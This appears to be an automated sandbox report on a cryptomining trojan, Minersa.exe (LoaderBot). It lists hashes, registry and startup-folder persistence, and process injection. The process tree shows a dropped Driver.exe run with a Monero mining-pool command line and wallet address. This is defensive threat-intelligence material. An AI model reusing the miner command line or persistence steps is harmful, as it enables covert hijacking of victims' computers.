Analysis
-
max time kernel
154s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16/04/2022, 05:50
Static task
static1
Behavioral task
behavioral1
Sample
Minersa.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Minersa.exe
Resource
win10v2004-20220414-en
General
-
Target
Minersa.exe
-
Size
4.0MB
-
MD5
dfc3e56cc6384a5f49069a49d658a987
-
SHA1
75294fc109314949b1b5d00669d4b73a323e290c
-
SHA256
7656ed477671645be99bd254dc2547709e6545b2fc40124cd2bc4fac38d18447
-
SHA512
97b65880ca0788a5b86357802a3042e1619957ebd386afb2b8e115a951560b4cf9477b980cbad31a907f09b1c6646a408c8cc45b748e9f4f77d8acb401780824
Malware Config
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/3580-130-0x0000000000FA0000-0x00000000013A0000-memory.dmp loaderbot -
Executes dropped EXE 3 IoCs
pid Process 2756 Driver.exe 3484 Driver.exe 4040 Driver.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation Minersa.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url Minersa.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Minersa.exe" Minersa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2768 2756 WerFault.exe 78 4268 3484 WerFault.exe 83 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe 3580 Minersa.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 644 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3580 Minersa.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3580 Minersa.exe Token: SeLockMemoryPrivilege 2756 Driver.exe Token: SeLockMemoryPrivilege 2756 Driver.exe Token: SeLockMemoryPrivilege 4040 Driver.exe Token: SeLockMemoryPrivilege 4040 Driver.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3580 wrote to memory of 2756 3580 Minersa.exe 78 PID 3580 wrote to memory of 2756 3580 Minersa.exe 78 PID 3580 wrote to memory of 3484 3580 Minersa.exe 83 PID 3580 wrote to memory of 3484 3580 Minersa.exe 83 PID 3580 wrote to memory of 4040 3580 Minersa.exe 87 PID 3580 wrote to memory of 4040 3580 Minersa.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\Minersa.exe"C:\Users\Admin\AppData\Local\Temp\Minersa.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AJRdL1789zfDDn4L3pUSNBs1ick9moyoTfiUL3Gh2V4fPRDQqqVGwBW8rzWVLzXv2HScqDWo3geT7AJwLqefADwQ3cyPfg -p x -k -v=0 --donate-level=1 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2756 -s 7643⤵
- Program crash
PID:2768
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AJRdL1789zfDDn4L3pUSNBs1ick9moyoTfiUL3Gh2V4fPRDQqqVGwBW8rzWVLzXv2HScqDWo3geT7AJwLqefADwQ3cyPfg -p x -k -v=0 --donate-level=1 -t 12⤵
- Executes dropped EXE
PID:3484 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3484 -s 5643⤵
- Program crash
PID:4268
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AJRdL1789zfDDn4L3pUSNBs1ick9moyoTfiUL3Gh2V4fPRDQqqVGwBW8rzWVLzXv2HScqDWo3geT7AJwLqefADwQ3cyPfg -p x -k -v=0 --donate-level=1 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 2756 -ip 27561⤵PID:3500
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 3484 -ip 34841⤵PID:3756
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322